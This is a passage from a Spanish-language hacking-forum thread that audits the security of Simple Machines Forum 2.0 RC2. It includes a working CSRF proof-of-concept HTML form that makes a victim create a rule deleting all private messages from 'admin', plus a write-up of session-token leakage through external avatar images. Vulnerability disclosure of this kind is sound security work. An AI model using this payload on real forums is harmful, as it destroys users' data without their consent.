elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Auditoría de seguridad hacia Simple Machines Forum 2.0
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 [5] Ir Abajo Respuesta Imprimir
Autor Tema: Auditoría de seguridad hacia Simple Machines Forum 2.0  (Leído 48,796 veces)
WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.337


The Hacktivism is not a crime


Ver Perfil WWW
CSRF en las reglas de mensajes
« Respuesta #40 en: 30 Noviembre 2009, 22:37 pm »

Detalles
Descripción:CSRF en las reglas de mensajes
Descubierto por:brlvldvlsmrtnz@gmail.com
Código vulnerable:N/A
URL Vulnerable:http://localhost/SMF/index.php?action=pm;sa=manrules
PoC:N/A
Afecta a:‭‬SMF 2.0 RC2


Descripción

Este CSRF permitiría hacer cosas como que el usuario afectado borrara
automáticamente los MPs de otro usuario determinado.
La vulnerabilidad está en la url :
http://localhost/SMF/index.php?action=pm;sa=manrules
este POC que crea una regla que borra todos los mensajes que provengan
del user admin:

Código
  1. <title> New Poc </title>
  2. </head>
  3. <form name=POC method=POST action=http://localhost/SMF/index.php?action=pm;sa=manrules;save;rid=0>
  4. <input type=hidden value="Regla creada por CSRF" name=rule_name>
  5. <input type=hidden name=ruletype[0] value=mid>
  6. <input type=hidden name=ruledef[0] value=admin>
  7. <input type=hidden name=acttype[0] value=del>
  8. <input type=hidden name=save >
  9. </form>
  10. document.POC.submit();
  11. </body>
  12. </html>
« Última modificación: 2 Diciembre 2009, 03:57 am por WHK » En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.337


The Hacktivism is not a crime


Ver Perfil WWW
Robo del tocken de sesión (II)
« Respuesta #41 en: 30 Noviembre 2009, 22:40 pm »

Detalles
Descripción:Robo del tocken de sesión (II)
Descubierto por:WHK@elhacker.net
Código vulnerable:Cualquier theme que muestre el avatar en la página principal
URL Vulnerable:Todas
PoC:N/A
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2


Descripción

El problema está en que cada ves que haces una petición GET con tu token en
la url estás enviando tu hash que te protege ante ataques de tipo CSRF a
todas las direcciones de cada imagen mostrada.

Cuando las imagenes de un theme son locales no hay problema porque el token
queda guardado en los logs de acceso de tu servidor pero cuando smf muestra
alguna imagen externa estarás enviando directamente tu token a ese servidor.

¿Un ejemplo?
Hay themes que ponen tu avatar en la parte superior del foro en el
encabezado. Bastaría con que alguien utilize una imagen que esté alojada en
tu servidor para lanzarle un ataque de tipo CSRF de cualquier tipo
ejecutando acciones de forma arbitraria vulnerando cualquier tipo de cuenta
inclusive la de administración.

Nota de sirdarckcat
Citar
es un bug en algunos themes (el default no es vulnerable) y solo explotable si el
usuario pone su avatar en un servicio de hosting de imagenes que controla un
atacante.. la peligrosidad es baja creo yo..
« Última modificación: 2 Diciembre 2009, 03:57 am por WHK » En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.337


The Hacktivism is not a crime


Ver Perfil WWW
Re: XSS en el input "Sitio WEB" dentro del perfil de usuario
« Respuesta #42 en: 30 Noviembre 2009, 22:45 pm »

También se adjuntan los siguientes post con vulnerabilidades de SimpleMachines Forum con su descripción completa:

http://foro.elhacker.net/nivel_web/hackea_a_elhackernet_finalizado_ganador_yasion-t275475.0.html
http://foro.elhacker.net/nivel_web/backdoor_nativo_en_smf_20-t272107.0.html
http://foro.elhacker.net/nivel_web/multiples_inyecciones_sql_en_smf_1110_y_20_rc12-t270049.0.html

Notas:
El backdoor nativo fue removido del sistema a partir de la versión 2.0 rc2.
Algunos bugs fueron parchados en smf 1.1.11.
« Última modificación: 2 Diciembre 2009, 03:59 am por WHK » En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.337


The Hacktivism is not a crime


Ver Perfil WWW
Re: Auditoría de seguridad hacia Simple Machines Forum 2.0
« Respuesta #43 en: 9 Marzo 2010, 16:24 pm »

Simplemachines ya actualizó la versión RC2 de SMF 2.0 a la RC3 y algunos que estubimos en la auditoría aparecemos en el changelog :D

http://download.simplemachines.org/index.php?thanks;filename=smf_2-0-rc3_changelog.txt
En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
Páginas: 1 2 3 4 [5] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Auditoria de seguridad, mis comienzos...
Seguridad
Davisin 5 2,672 Último mensaje 9 Octubre 2012, 22:53 pm
por Epzylon
Auditoría de seguridad - Web Command Injection
Seguridad
MacGyver87 2 1,632 Último mensaje 29 Julio 2013, 14:37 pm
por MacGyver87
Simple Machines Forum hackeado y contraseñas de los usuarios en peligro
Foro Libre
Felix el Gato 1 1,441 Último mensaje 24 Julio 2013, 23:50 pm
por bacanzito
Hacia una evaluación eficaz de la seguridad en ICS
Noticias
r32 0 798 Último mensaje 4 Noviembre 2014, 18:02 pm
por r32
donde quitar el logo de simple machin forum
Dudas Generales
dark_night 1 955 Último mensaje 7 Abril 2016, 12:50 pm
por dark_night
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines